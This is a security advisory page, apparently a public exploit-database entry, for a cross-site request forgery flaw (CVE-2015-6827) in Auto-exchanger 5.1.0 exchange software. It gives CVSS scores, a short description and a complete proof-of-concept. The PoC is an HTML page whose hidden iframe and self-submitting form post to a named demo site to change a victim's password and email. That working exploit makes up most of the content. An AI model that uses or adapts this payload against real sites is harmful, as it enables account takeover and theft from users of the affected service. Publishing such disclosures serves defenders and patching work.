Autoexchanger 5.1.0 Cross Site Request Forgery

2015.09.09
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: [Auto-exchanger version 5.1.0 Xsrf] # Date: [2015/06/05] # Exploit Author: [Aryan Bayaninejad] # Linkedin : [https://www.linkedin.com/profile/view?id=276969082] # Vendor Homepage: [www.auto-exchanger.com] # Version: [Version 5.1.0] # Demo : www.farhadexchange.com # CVE : [CVE-2015-6827] ------------------------------------ details: ------------------------------------ auto-exchanger version 5.1.0 suffers from an xsrf vulnerability , attacker is able to abuse of this vulnerability to change password by a hidden iframe in another page. ------------------------------------- Exploit: ------------------------------------- <html> <body> <iframe style="display:none" name="xsrf-frame"></iframe> <form method='POST' action='http://farhadexchange.com/signup.php' target="xsrf-frame" id="xsrf-form"> <label id="lbl_error" name="lbl_error" class="ErrorMessage"></label> <INPUT type="hidden" name="suser" value="victim_user"> <input type="hidden" name="section" value="do_update" /> <label type='hidden' id="n_password0"><span> <input type='hidden' maxlength="20" size="30" name="password0" id="password0" value="testpassword123456" > </label> <input type="hidden" name="rid" value="" /> <label id="n_password"> <input type="hidden" maxlength="20" size="30" name="password1" id="password1" value="testpassword123456" ></label> <label id="n_mail"> <INPUT type='hidden' maxLength=60 size=30 name="mail" id="mail" value="victim_email" type="text"> </label> <label id="n_country"> <input type='hidden' name="country" id="country" style="width:196;" value="IR"> </label> <label id="cid"> <input type='hidden' name='cid' value='2'/> </label> <label id="n_curreny_account"> <INPUT type='hidden' maxLength=60 size=30 name="curreny_account" id="curreny_account" value="" ><br> </label> </form> <script>document.getElementById("xsrf-form").submit()</script> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top